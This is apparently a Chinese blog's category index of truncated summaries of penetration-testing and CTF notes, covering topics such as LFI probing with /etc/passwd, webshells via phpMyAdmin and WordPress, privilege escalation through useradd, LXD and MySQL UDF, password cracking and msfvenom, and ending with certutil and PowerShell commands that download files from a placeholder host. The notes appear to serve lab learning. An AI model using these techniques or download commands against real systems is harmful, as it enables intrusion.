随笔分类 - 随记
摘要:# Web信息收集步骤 1. 利用浏览器查看所有页面,并且检查页面源代码,注意备注信息以及可以链接 2. /robots.txt 3. Nikto工具扫描Web技术架构以及可能存在的目录或者文件,并且可能可以直接给出漏洞 4. Gobuster,dirb,dirsearch,并且利用各个主要的wor
阅读全文
摘要:## 本地文件包含漏洞利用注意事项 1. 当怀疑某个URL中的参数有LFI漏洞时,可以用/etc/passwd, /var/log/auth.log, /var/log/apache2/access.log,等进行测试,如果已知靶机有其他服务,比如邮件,那么可能还需要测试/var/mail/用户名
阅读全文
摘要:Centos 7 安装Wordpress 安装Centos 7 在VMWARE安装Centos 7(步骤略) 备份原有的yum源文件,更新yum源为阿里云 [root@localhost yum.repos.d]# ls | xargs -t -i mv {} {}.bak [root@localh
阅读全文
摘要:CTF测试过程中遇到Forbidden目录的处理办法 当CTF测试过程中利用gobuster工具扫描出目录,而且此时没有其他更多的目录或者方法时,访问该目录,返回forbidden的信息,则: 第一:尝试扫描该目录有无下级目录或者文件 第二:看是否可以在请求头中增加X-Forwarded-For字段
阅读全文
摘要:通过FTP获得靶机Shell步骤说明 当已经获取到FTP的用户名和密码,并且该用户有权限上传文件以及创建文件,那么基于此获取Shell的步骤如下: 1.在Kali Linux上利用ssh-keygen命令创建公私钥文件,并将这些文件移动到工作目录,方便后面通过FTP上传 ┌──(root💀kali
阅读全文
摘要:各种WIFI对应标准以及速度 | No. | WIFI Term | Standard | Speed | |: :|: :| |: :| | 1 | WIFI1 | IEEE 802.11b | 1, 2, 5.5 and 11 Mbps | | 2 | WIFI2 | IEEE 802.11a
阅读全文
摘要:id_rsa/id_rsa.pub/authorized_keys之间的区别说明 公私钥方式登录就是为了让两个linux机器之间使用ssh不需要用户名和密码。采用了数字签名RSA或者DSA来完成这个操作。 假设 A (192.168.56.206)为客户机器,B(192.168.56.208)为目标
阅读全文
摘要:CentOS 7 快速安装单机版OpenStack 准备环境 安装CentOS 7 虚拟机,vCPU 2x2, 内存16G,网络模式为NAT,要保证可以正常上网。 [root@localhost ~]# ping www.baidu.com PING www.a.shifen.com (110.24
阅读全文
摘要:利用John the Ripper工具破解Linux用户密码 在/etc/passwd文件中选取想要破解的用户名的所在行,拷贝创建以该行为内容的文件,同时在/etc/shadow文件中选取相应用户名的所在行,并拷贝创建以该行为内容的文件 ┌──(kali㉿kali)-[~/Desktop/Vulnh
阅读全文
摘要:利用phpmyadmin拿Webshell 当拿到phpmyadmin的用户名密码后,如何拿到webshell呢,步骤如下: 确认可以通过phpmyadmin写入文件,执行SQL语句: show global variables like "secure%"; secure_file_priv: 值
阅读全文
摘要:利用Useradd命令提权步骤 如果Shell用户的sudo权限中可以执行命令useradd,那么可以通过该命令实现提权。 第一步:可以在Kali Linux上创建用户密码(假设要创建的用户名为jason) ┌──(kali㉿kali)-[~] └─$ openssl passwd -6 -salt
阅读全文
摘要:利用LXD实现本地提权 LXD简介 LXD 是基于LXC容器的管理程序(hypervisor),它由开发 Ubuntu 的公司 Canonical 创建和维护。它由3个组建构成: lxd :系统守护进程,它导出能被本地和网络访问的 RESTful API lxc :客户端命令行,它能跨网络管理多个容
阅读全文
摘要:拿Wordpress Shell的若干方法 在满足以下条件后,设法通过目标主机的Wordpress后台获得目标主机的Shell: 通过目录扫描工具比如Gobuster定位wordpress站点的所在目录; 通过WPSCAN工具或者Hydra工具得到wordpress的管理员用户名和密码,或者其他方法
阅读全文
摘要:Ubuntu 18.04安装Docker步骤以及错误解决方法 sudo apt-get update sudo apt-get install \ ca-certificates \ curl \ gnupg \ lsb-release sudo mkdir -p /etc/apt/keyrings
阅读全文
摘要:MSFVENOM使用步骤 概述 MSFvenom是Msfpayload和Msfencode的组合,可以生成各种攻击载荷,并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上,而msfvenom可以快速创建符合靶机的载荷,Msfvenom 包含标准的命令行选项。可以为许多平台生成有效
阅读全文
摘要:CTF中网站用户登录页面渗透测试步骤 CTF测试中经常遇到靶机的HTTP服务需要用户认证才能登录其后台,因此很多情况下需要绕开登录的认证限制或者得到用户名密码信息。按照优先级,对CTF中网站用户登录按下面的步骤进行尝试: 用弱密码登录,比如admin, root, password等。 查看页面源代
阅读全文
摘要:利用Mysql提权的步骤以及一种低级错误的说明 通过一些方式获取了目标主机mysql的用户名和密码,这时我们想通过mysql来执行系统命令,此时我们可以考虑使用UDF进行提权。需要提前将lib_mysqludf_sys_64.so文件(Kali linux上有该文件)上传至靶机/tmp目录下。然后连
阅读全文
摘要:SSH利用私钥登录时一个简单错误的解决过程 问题描述 在一次渗透测试过程中,利用linpeas.sh脚本扫描有无本地提权漏洞,发现了目标靶机有SSH私钥,并且又相应的权限读取,因此从linpeas.sh脚本的输出结果中SSH私钥相应的内容拷贝至攻击机本地, ┌──(kali㉿kali)-[~/Vul
阅读全文
摘要:问题说明: $ showmount -e 目标服务器 从命令输出已经知道目标服务器存在NFS共享,共享目录的名称比如/sharedata 但是从客户端挂载目标服务器的共享目录时出现一下错误: ┌──(kali㉿kali)-[~/Vulnhub/My_File_Server_2] └─$ mount
阅读全文
摘要:目标机器为Windows: Certutil.exe certutil -urlcache -split -f "http://ip-addr:port/file" [output-file] Powershell powershell -c (New-Object Net.WebClient).D
阅读全文
浙公网安备 33010602011771号